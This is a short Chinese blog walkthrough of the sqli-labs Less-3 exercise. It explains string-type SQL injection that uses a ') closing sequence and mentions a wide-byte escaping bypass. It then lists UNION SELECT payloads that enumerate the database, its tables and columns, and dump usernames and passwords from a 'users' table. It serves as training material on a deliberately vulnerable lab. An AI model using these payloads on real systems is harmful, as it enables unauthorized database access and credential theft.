【SQL注入】Less-3错误型GET单引号变形字符型注入

Less-3错误型GET单引号变形字符型注入

什么是sql变形字符串注入?最常见的有:
1、将查询条件转为base64
2、本实验用)来实现变形;
3、宽字节字体编码利用,例如gbk中文字符,这种比较难用;例如试图用%df%5c%27试图在%df%5c%27为中文字符绕过%27PHP魔术引用的转义成\%27但也要取决于环境;故此宽字节去做sql注入的转义绕过很难。

实验漏洞复现介绍

该实验与Less-2错误型GET整型注入 区别在于,构建payload新增')单引号;)表示变形!

1、爆开数据库

payload

?id=0') union select 1,2,database() --+

2、爆开数据表

payload

?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

3、表开数据列(字段)

payload

?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

4、爆开数据值

payload

?id=0') union select 1,group_concat(username,0x3a,password),3 from users--+

猜你喜欢

转载自blog.csdn.net/Mitchell_Donovan/article/details/115335792
今日推荐